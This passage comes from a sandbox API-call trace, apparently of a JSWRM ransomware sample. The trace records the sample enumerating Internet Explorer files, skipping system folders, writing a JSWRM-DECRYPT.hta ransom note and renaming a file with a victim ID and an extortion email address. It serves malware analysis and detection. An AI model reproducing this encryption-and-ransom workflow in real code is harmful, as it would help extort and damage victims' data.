returned 1 [0069.376] lstrcmpiW (lpString1="ieinstal.exe", lpString2="...") returned 1 [0069.376] lstrcmpiW (lpString1="ieinstal.exe", lpString2="windows") returned -1 [0069.376] lstrcmpiW (lpString1="ieinstal.exe", lpString2="recovery") returned -1 [0069.376] lstrcmpiW (lpString1="ieinstal.exe", lpString2="perflogs") returned -1 [0069.376] lstrcmpiW (lpString1="ieinstal.exe", lpString2="documents and settings") returned 1 [0069.377] lstrcmpiW (lpString1="ieinstal.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.377] lstrcmpiW (lpString1="ieinstal.exe", lpString2="system volume information") returned -1 [0069.377] lstrcmpiW (lpString1="ieinstal.exe", lpString2="msocache") returned -1 [0069.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe", cchWideChar=12, lpMultiByteStr=0x345f610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ieinstal.exe", lpUsedDefaultChar=0x0) returned 12 [0069.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ieinstal.exe", cchWideChar=12, lpMultiByteStr=0x345f5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ieinstal.exe", lpUsedDefaultChar=0x0) returned 12 [0069.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0069.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.377] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2=".") returned 1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="..") returned 1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="...") returned 1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="windows") returned -1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="recovery") returned -1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="perflogs") returned -1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="documents and settings") returned 1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="system volume information") returned -1 [0069.377] lstrcmpiW (lpString1="ielowutil.exe", lpString2="msocache") returned -1 [0069.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ielowutil.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ielowutil.exe", cchWideChar=13, lpMultiByteStr=0x345f610, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ielowutil.exe", lpUsedDefaultChar=0x0) returned 13 [0069.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ielowutil.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ielowutil.exe", cchWideChar=13, lpMultiByteStr=0x345f5e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ielowutil.exe", lpUsedDefaultChar=0x0) returned 13 [0069.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0069.378] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4c60b4, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x63800, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2=".") returned 1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="..") returned 1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="...") returned 1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="windows") returned -1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="recovery") returned -1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="perflogs") returned -1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="documents and settings") returned 1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="system volume information") returned -1 [0069.378] lstrcmpiW (lpString1="IEShims.dll", lpString2="msocache") returned -1 [0069.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0069.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEShims.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEShims.dll", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEShims.dll", lpUsedDefaultChar=0x0) returned 11 [0069.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0069.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEShims.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IEShims.dll", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IEShims.dll", lpUsedDefaultChar=0x0) returned 11 [0069.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0069.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.378] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa182b3a4, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa1c0b0e4, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x8ca44c00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc9340, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2=".") returned 1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="..") returned 1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="...") returned 1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="windows") returned -1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="recovery") returned -1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="perflogs") returned -1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="documents and settings") returned 1 [0069.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.379] lstrcmpiW (lpString1="iexplore.exe", lpString2="system volume information") returned -1 [0069.379] lstrcmpiW (lpString1="iexplore.exe", lpString2="msocache") returned -1 [0069.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0x345f610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 12 [0069.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=12, lpMultiByteStr=0x345f5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 12 [0069.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0069.379] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a485593, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf0988, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0069.379] lstrcmpiW (lpString1="images", lpString2=".") returned 1 [0069.379] lstrcmpiW (lpString1="images", lpString2="..") returned 1 [0069.379] lstrcmpiW (lpString1="images", lpString2="...") returned 1 [0069.379] lstrcmpiW (lpString1="images", lpString2="windows") returned -1 [0069.379] lstrcmpiW (lpString1="images", lpString2="recovery") returned -1 [0069.379] lstrcmpiW (lpString1="images", lpString2="perflogs") returned -1 [0069.379] lstrcmpiW (lpString1="images", lpString2="documents and settings") returned 1 [0069.379] lstrcmpiW (lpString1="images", lpString2="$RECYCLE.BIN") returned 1 [0069.379] lstrcmpiW (lpString1="images", lpString2="system volume information") returned -1 [0069.379] lstrcmpiW (lpString1="images", lpString2="msocache") returned -1 [0069.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0069.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0069.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0069.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\images\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\images\\jswrm-decrypt.hta")) returned 0xffffffff [0069.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c1c4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24b1c8 [0069.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24cf98 [0069.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0069.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.380] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\images\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\images\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0069.380] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.380] WriteFile (in: hFile=0x3d4, lpBuffer=0x345c2d8*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c2a4, lpOverlapped=0x0 | out: lpBuffer=0x345c2d8*, lpNumberOfBytesWritten=0x345c2a4*=0x230c, lpOverlapped=0x0) returned 1 [0069.381] CloseHandle (hObject=0x3d4) returned 1 [0069.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24cf98 | out: hHeap=0x1e0000) returned 1 [0069.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0069.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0069.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0069.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\images\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\internet explorer\\images\\jswrm-decrypt.hta")) returned 0x20 [0069.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.382] FindFirstFileW (in: lpFileName="C:\\Program Files\\Internet Explorer\\images\\*.*", lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20034d7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName=".", cAlternateFileName="")) returned 0x232040 [0069.382] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.382] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d846d9, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20034d7a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="..", cAlternateFileName="")) returned 1 [0069.382] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.382] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.382] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a55ea4d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a55ea4d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a55ea4d, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x60002, dwReserved1=0x20ac7e, cFileName="bing.ico", cAlternateFileName="")) returned 1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2=".") returned 1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="..") returned 1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="...") returned 1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="windows") returned -1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="recovery") returned -1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="perflogs") returned -1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="documents and settings") returned -1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="$RECYCLE.BIN") returned 1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="system volume information") returned -1 [0069.382] lstrcmpiW (lpString1="bing.ico", lpString2="msocache") returned -1 [0069.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bing.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bing.ico", cchWideChar=8, lpMultiByteStr=0x345f2a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bing.ico", lpUsedDefaultChar=0x0) returned 8 [0069.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bing.ico", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bing.ico", cchWideChar=8, lpMultiByteStr=0x345f278, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bing.ico", lpUsedDefaultChar=0x0) returned 8 [0069.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0069.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.383] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.388] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9173294232146768) returned 0 [0069.388] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0069.388] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0, lpNumberOfBytesRead=0x345ef6c*=0x0, lpOverlapped=0x0) returned 0 [0069.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0069.388] CloseHandle (hObject=0xffffffff) returned 1 [0069.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0069.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0069.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2175c0 [0069.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0069.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2175c0 | out: hHeap=0x1e0000) returned 1 [0069.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Internet Explorer\\images\\bing.ico" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico"), lpNewFileName="C:\\Program Files\\Internet Explorer\\images\\bing.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\internet explorer\\images\\bing.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0069.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.389] HeapFree (in: 